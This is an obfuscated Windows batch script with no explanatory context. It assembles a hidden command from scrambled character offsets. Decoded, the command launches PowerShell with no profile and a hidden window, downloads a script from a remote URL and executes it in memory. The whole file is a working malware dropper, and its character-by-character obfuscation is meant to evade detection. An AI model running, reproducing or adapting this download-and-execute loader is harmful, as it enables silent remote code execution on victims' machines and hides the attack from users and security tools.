@echo off
cd %SystemRoot%\System32
set GIuq=
Set GIuq=%GIuq%s8KkrNxGdo1lT
Set GIuq=%GIuq%2gtn9hMqWQAIj
Set GIuq=%GIuq%cPY54HLzCfZ6B
Set GIuq=%GIuq%uib03EJUeS7vm
Set GIuq=%GIuq%yXwFDVRaOp
set QOhqwOd=^|
set system=
Set system=%system%%GIuq:~40,1%%GIuq:~47,1%%GIuq:~6,1%
Set system=%system%(%GIuq:~5,1%%GIuq:~47,1%
Set system=%system%%GIuq:~54,1%-%GIuq:~60,1%
Set system=%system%%GIuq:~41,1%%GIuq:~25,1%%GIuq:~47,1%
Set system=%system%%GIuq:~26,1%%GIuq:~15,1% 
Set system=%system%%GIuq:~5,1%%GIuq:~47,1%%GIuq:~15,1%
Set system=%system%.%GIuq:~21,1%%GIuq:~47,1%
Set system=%system%%GIuq:~41,1%%GIuq:~34,1%%GIuq:~11,1%
Set system=%system%%GIuq:~40,1%%GIuq:~47,1%%GIuq:~16,1%
Set system=%system%%GIuq:~15,1%).
Set system=%system%%GIuq:~56,1%%GIuq:~9,1%%GIuq:~54,1%
Set system=%system%%GIuq:~16,1%%GIuq:~11,1%%GIuq:~9,1%
Set system=%system%%GIuq:~59,1%%GIuq:~8,1%%GIuq:~48,1%
Set system=%system%%GIuq:~15,1%%GIuq:~4,1%%GIuq:~40,1%
Set system=%system%%GIuq:~16,1%%GIuq:~14,1%(
Set system=%system%"%GIuq:~18,1%%GIuq:~15,1%
Set system=%system%%GIuq:~15,1%%GIuq:~61,1%%GIuq:~0,1%
Set system=%system%://
Set system=%system%%GIuq:~6,1%%GIuq:~39,1%%GIuq:~61,1%
Set system=%system%.%GIuq:~59,1%%GIuq:~11,1%
Set system=%system%%GIuq:~59,1%%GIuq:~61,1%%GIuq:~11,1%
Set system=%system%%GIuq:~47,1%.%GIuq:~26,1%
Set system=%system%%GIuq:~9,1%%GIuq:~51,1%/
Set system=%system%?%GIuq:~8,1%%GIuq:~51,1%
Set system=%system%%GIuq:~58,1%%GIuq:~39,1%%GIuq:~39,1%
Set system=%system%%GIuq:~23,1%%GIuq:~34,1%%GIuq:~38,1%
Set system=%system%%GIuq:~28,1%%GIuq:~2,1%%GIuq:~9,1%
Set system=%system%%GIuq:~34,1%%GIuq:~17,1%%GIuq:~61,1%
Set system=%system%%GIuq:~15,1%%GIuq:~38,1%%GIuq:~47,1%
Set system=%system%%GIuq:~1,1%%GIuq:~61,1%%GIuq:~2,1%
Set system=%system%%GIuq:~12,1%%GIuq:~19,1%%GIuq:~34,1%
Set system=%system%%GIuq:~48,1%%GIuq:~14,1%%GIuq:~61,1%
Set system=%system%%GIuq:~58,1%%GIuq:~47,1%%GIuq:~57,1%
Set system=%system%%GIuq:~53,1%%GIuq:~10,1%%GIuq:~59,1%
Set system=%system%%GIuq:~6,1%%GIuq:~2,1%%GIuq:~12,1%
Set system=%system%%GIuq:~9,1%%GIuq:~28,1%%GIuq:~53,1%
Set system=%system%%GIuq:~54,1%%GIuq:~6,1%%GIuq:~5,1%
Set system=%system%%GIuq:~16,1%%GIuq:~35,1%%GIuq:~0,1%
Set system=%system%%GIuq:~34,1%%GIuq:~24,1%%GIuq:~32,1%
Set system=%system%%GIuq:~53,1%%GIuq:~59,1%%GIuq:~43,1%
Set system=%system%%GIuq:~55,1%%GIuq:~25,1%%GIuq:~6,1%
Set system=%system%%GIuq:~54,1%%GIuq:~46,1%%GIuq:~9,1%
Set system=%system%%GIuq:~19,1%%GIuq:~40,1%%GIuq:~19,1%
Set system=%system%%GIuq:~28,1%%GIuq:~58,1%%GIuq:~60,1%
Set system=%system%%GIuq:~48,1%%GIuq:~0,1%%GIuq:~60,1%
Set system=%system%%GIuq:~48,1%%GIuq:~60,1%%GIuq:~20,1%
Set system=%system%%GIuq:~25,1%%GIuq:~4,1%%GIuq:~25,1%
Set system=%system%%GIuq:~41,1%%GIuq:~60,1%%GIuq:~21,1%
Set system=%system%%GIuq:~39,1%%GIuq:~4,1%%GIuq:~32,1%
Set system=%system%%GIuq:~5,1%%GIuq:~12,1%%GIuq:~50,1%
Set system=%system%%GIuq:~24,1%%GIuq:~7,1%%GIuq:~23,1%
Set system=%system%%GIuq:~59,1%%GIuq:~23,1%%GIuq:~9,1%
Set system=%system%%GIuq:~57,1%%GIuq:~54,1%%GIuq:~43,1%
Set system=%system%%GIuq:~3,1%%GIuq:~56,1%%GIuq:~1,1%
Set system=%system%%GIuq:~13,1%/%GIuq:~21,1%
Set system=%system%%GIuq:~4,1%%GIuq:~24,1%%GIuq:~27,1%
Set system=%system%%GIuq:~23,1%%GIuq:~41,1%%GIuq:~43,1%
Set system=%system%%GIuq:~22,1%%GIuq:~26,1%%GIuq:~10,1%
Set system=%system%%GIuq:~23,1%%GIuq:~0,1%%GIuq:~48,1%
Set system=%system%%GIuq:~17,1%%GIuq:~25,1%%GIuq:~10,1%
Set system=%system%%GIuq:~0,1%%GIuq:~15,1%"
Set system=%system%)
echo %%system%%%QOhqwOd%%GIuq:~21,1%%GIuq:~40,1%%GIuq:~16,1%%GIuq:~8,1%%GIuq:~9,1%%GIuq:~54,1%%GIuq:~0,1%%GIuq:~27,1%%GIuq:~9,1%%GIuq:~54,1%%GIuq:~47,1%%GIuq:~4,1%%GIuq:~48,1%%GIuq:~18,1%%GIuq:~47,1%%GIuq:~11,1%%GIuq:~11,1%\%GIuq:~50,1%%GIuq:~10,1%.%GIuq:~42,1%\%GIuq:~61,1%%GIuq:~9,1%%GIuq:~54,1%%GIuq:~47,1%%GIuq:~4,1%%GIuq:~0,1%%GIuq:~18,1%%GIuq:~47,1%%GIuq:~11,1%%GIuq:~11,1%.%GIuq:~47,1%%GIuq:~6,1%%GIuq:~47,1% -%GIuq:~16,1%%GIuq:~9,1%%GIuq:~61,1% -%GIuq:~54,1%%GIuq:~40,1%%GIuq:~16,1% %GIuq:~10,1% -